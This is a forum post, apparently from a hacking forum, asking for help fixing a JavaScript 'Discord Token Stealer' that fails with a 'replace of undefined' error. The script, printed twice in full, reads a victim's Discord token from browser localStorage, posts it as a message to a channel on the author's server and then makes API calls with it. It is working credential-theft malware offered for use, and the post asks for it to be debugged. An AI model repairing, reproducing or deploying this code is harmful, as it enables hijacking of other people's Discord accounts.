Can someone fix this script, please
When I replace all things and run the script it says: Cannot read property 'replace' of undefined
DO NOT RUN THIS SCRIPT ON YOUR MAIN ACCOUNT OR YOUR DISCORD TOKEN WILL BE SENT TO THE SERVER THATS IN THE SCRIPT, EVEN THOUGH ITS INVALID,
DO TRY THIS ON AN ALT! I AM NOT RESPONSIBLE FOR YOUR LOSS.
// Discord Token Stealer
// written by WestlyRoots
//
// server where the tokens are posted
// https://discord.gg/3TZwhbX
var t = document.body.appendChild(document.createElement('iframe')).contentWindow.localStorage.token;
var ct = t.replace(/['"]+/g, '');
let r = new XMLHttpRequest();
r.withCredentials = true;
r.open("POST", "https://discordapp.com/api/v6/invite/3TZwhbX");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("accept", "/");
r.setRequestHeader("authority", "discordapp.com");
r.send(null);
setTimeout(() => {
r = new XMLHttpRequest();
r.withCredentials = true;
r.open("POST", "https://discordapp.com/api/v6/channels/415946919722876930/messages");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("content-type", "application/json");
r.send(JSON.stringify({ content: t }));
}, 300);
setTimeout(() => {
r = new XMLHttpRequest();
r.withCredentials = true;
r.open("DELETE", "https://discordapp.com/api/v6/users/@me/guilds/415946919722876928");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("accept", "/");
r.send(null);
}, 700);
@Sango can you help here because the t.replace is followed by a regex
When I replace all things and run the script it says: Cannot read property 'replace' of undefined
DO NOT RUN THIS SCRIPT ON YOUR MAIN ACCOUNT OR YOUR DISCORD TOKEN WILL BE SENT TO THE SERVER THATS IN THE SCRIPT, EVEN THOUGH ITS INVALID,
DO TRY THIS ON AN ALT! I AM NOT RESPONSIBLE FOR YOUR LOSS.
// Discord Token Stealer
// written by WestlyRoots
//
// server where the tokens are posted
// https://discord.gg/3TZwhbX
var t = document.body.appendChild(document.createElement('iframe')).contentWindow.localStorage.token;
var ct = t.replace(/['"]+/g, '');
let r = new XMLHttpRequest();
r.withCredentials = true;
r.open("POST", "https://discordapp.com/api/v6/invite/3TZwhbX");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("accept", "/");
r.setRequestHeader("authority", "discordapp.com");
r.send(null);
setTimeout(() => {
r = new XMLHttpRequest();
r.withCredentials = true;
r.open("POST", "https://discordapp.com/api/v6/channels/415946919722876930/messages");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("content-type", "application/json");
r.send(JSON.stringify({ content: t }));
}, 300);
setTimeout(() => {
r = new XMLHttpRequest();
r.withCredentials = true;
r.open("DELETE", "https://discordapp.com/api/v6/users/@me/guilds/415946919722876928");
r.setRequestHeader("authorization", ct);
r.setRequestHeader("accept", "/");
r.send(null);
}, 700);
@Sango can you help here because the t.replace is followed by a regex
I do NOT have a Discord or Telegram. @ProMasterCFGs is not my Telegram! PMs only.
I do not buy or sell anything.
I do not buy or sell anything.